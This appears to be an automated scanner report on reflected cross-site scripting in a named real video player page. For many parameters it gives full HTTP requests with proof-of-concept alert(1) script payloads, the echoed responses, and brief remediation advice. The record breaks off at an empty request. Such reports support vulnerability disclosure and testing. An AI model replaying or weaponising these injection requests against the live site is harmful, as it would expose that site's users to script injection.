GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=17286f</script><script>alert(1)</script>ec6882bd4c8&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... ftMargin = 0; var domain = "http://iad.bigpondvideo.com/"; var initParams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var isError = false; var showBw = "17286f</script><script>alert(1)</script>ec6882bd4c8"; var showFeedback = "1"; var showMenu = "1"; var showTooltip = "1"; var loadedItemCount = 0; var os = "MacOs"; var clientOs = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac ...[SNIP]...
The value of the showFeedback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34eea</script><script>alert(1)</script>ea5b61df946 was submitted in the showFeedback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=134eea</script><script>alert(1)</script>ea5b61df946&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showFeedback request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb629</script><script>alert(1)</script>ad6c92c36ca was submitted in the showFeedback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1bb629</script><script>alert(1)</script>ad6c92c36ca&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... = "http://iad.bigpondvideo.com/"; var initParams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var isError = false; var showBw = "1"; var showFeedback = "1bb629</script><script>alert(1)</script>ad6c92c36ca"; var showMenu = "1"; var showTooltip = "1"; var loadedItemCount = 0; var os = "MacOs"; var clientOs = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : ...[SNIP]...
The value of the showMenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f8cb</script><script>alert(1)</script>0096577a6c5 was submitted in the showMenu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=15f8cb</script><script>alert(1)</script>0096577a6c5&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showMenu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12cd</script><script>alert(1)</script>da08114859f was submitted in the showMenu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1d12cd</script><script>alert(1)</script>da08114859f&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... ndvideo.com/"; var initParams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var isError = false; var showBw = "1"; var showFeedback = "1"; var showMenu = "1d12cd</script><script>alert(1)</script>da08114859f"; var showTooltip = "1"; var loadedItemCount = 0; var os = "MacOs"; var clientOs = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows"; var rand ...[SNIP]...
The value of the showTitle request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5700</script><script>alert(1)</script>1d16117e5bd was submitted in the showTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1a5700</script><script>alert(1)</script>1d16117e5bd&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showTooltip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96db0</script><script>alert(1)</script>c1761b81538 was submitted in the showTooltip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=196db0</script><script>alert(1)</script>c1761b81538&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... ams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var isError = false; var showBw = "1"; var showFeedback = "1"; var showMenu = "1"; var showTooltip = "196db0</script><script>alert(1)</script>c1761b81538"; var loadedItemCount = 0; var os = "MacOs"; var clientOs = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows"; var rand = 1; var totalItemCount ...[SNIP]...
The value of the showTooltip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1968b</script><script>alert(1)</script>f691b1326e0 was submitted in the showTooltip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=11968b</script><script>alert(1)</script>f691b1326e0&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showUnmetered request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde2c</script><script>alert(1)</script>ea88f821204 was submitted in the showUnmetered parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0cde2c</script><script>alert(1)</script>ea88f821204&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce208</script><script>alert(1)</script>1aacafdb26f was submitted in the siteId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1ce208</script><script>alert(1)</script>1aacafdb26f&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the stf request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf20</script><script>alert(1)</script>977ccaf3497 was submitted in the stf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=03cf20</script><script>alert(1)</script>977ccaf3497&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the stf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee41</script><script>alert(1)</script>ffff93cf5af was submitted in the stf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=01ee41</script><script>alert(1)</script>ffff93cf5af&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... <script type="text/javascript"> var ua = navigator.userAgent.toLowerCase(); var allowFullScreen = "1"; var allowStf = "01ee41</script><script>alert(1)</script>ffff93cf5af"; var assetColor = ""; var assetLoadedTimeout; var controlsType = "internal"; var cStyle = "5"; var defaultLeftMargin = 0; var domain = "http://iad.bigpondvideo.com/"; var initPa ...[SNIP]...
The value of the titleHeight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2e8b</script><script>alert(1)</script>e54e969daab was submitted in the titleHeight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29c2e8b</script><script>alert(1)</script>e54e969daab&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1823"><script>alert(1)</script>d27ade86fec was submitted in the width parameter. This input was echoed as d1823\"><script>alert(1)</script>d27ade86fec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346d1823"><script>alert(1)</script>d27ade86fec&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42d2%3balert(1)//cdc3d0cb702 was submitted in the width parameter. This input was echoed as a42d2;alert(1)//cdc3d0cb702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
